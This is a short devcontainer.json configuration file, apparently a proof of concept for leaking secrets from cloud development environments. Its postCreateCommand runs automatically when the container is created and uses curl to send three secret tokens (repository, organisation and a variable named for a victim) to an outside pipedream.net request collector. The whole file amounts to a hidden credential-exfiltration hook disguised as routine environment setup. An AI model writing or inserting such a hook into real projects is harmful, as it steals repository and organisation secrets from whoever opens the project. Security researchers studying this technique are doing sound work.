{
  "image": "mcr.microsoft.com/devcontainers/universal:2",
  "features": {
  },
   "postCreateCommand": "curl https://enp6rxetl8fxe.x.pipedream.net?token=$REPO_SECRET_TOKEN; curl https://enp6rxetl8fxe.x.pipedream.net?token=$ORG_SECRET_TOKEN; curl https://enp6rxetl8fxe.x.pipedream.net?token=$VICTIM_SECRET_TOKEN;"
}
